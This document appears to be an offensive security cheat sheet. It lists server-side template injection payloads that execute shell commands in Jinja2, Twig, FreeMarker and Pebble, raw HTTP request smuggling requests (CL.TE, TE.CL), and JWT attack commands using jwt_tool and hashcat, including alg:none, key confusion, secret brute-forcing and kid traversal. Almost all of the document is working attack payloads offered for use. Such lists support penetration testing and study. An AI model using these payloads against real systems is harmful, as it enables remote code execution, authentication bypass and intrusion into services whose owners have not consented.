SSTI Payloads by Template Engine
# Detection
{{7*7}} → 49 (Jinja2/Twig)
${7*7} → 49 (FreeMarker/Smarty)
<%= 7*7 %> → 49 (ERB/EJS)
# Jinja2 (Python Flask/Django) → RCE
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
{{ ''.__class__.__mro__[1].__subclasses__()[408]('id',shell=True,stdout=-1).communicate()[0].strip() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
# FreeMarker (Java)
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
# Pebble (Java)
{%set x = [1]%}{%for i in x%}{{i.class.forName('java.lang.Runtime').getMethod('exec',''.class).invoke(i.class.forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'id')}}{% endfor %}
HTTP Request Smuggling
# CL.TE attack — poison backend queue
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
# TE.CL attack
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
# Detect with timing (CL.TE)
POST / HTTP/1.1
Transfer-Encoding: chunked
Content-Length: 4
1
A
X # Frontend waits for Content-Length=4, backend waits for 0 chunk → timeout
JWT Attack Payloads
# 1. alg:none attack
# Decode JWT, change alg to "none", remove signature
python3 jwt_tool.py -X a
# 2. RS256 to HS256 key confusion
# Use server's public key as HMAC-SHA256 secret
python3 jwt_tool.py -X k -pk server_pub.pem
# 3. Brute force weak secret
python3 jwt_tool.py -C -d rockyou.txt
hashcat -m 16500 token.txt rockyou.txt
# 4. kid path traversal
# Inject: {"kid": "../../../../dev/null"}
# Sign with empty key ""
# 5. jwk header injection
# Include attacker's public key in JWT header
python3 jwt_tool.py -X i
For HTTP smuggling, use Burp's HTTP Request Smuggler extension (BApp Store) — it automates CL.TE/TE.CL detection and confirms vulnerabilities automatically.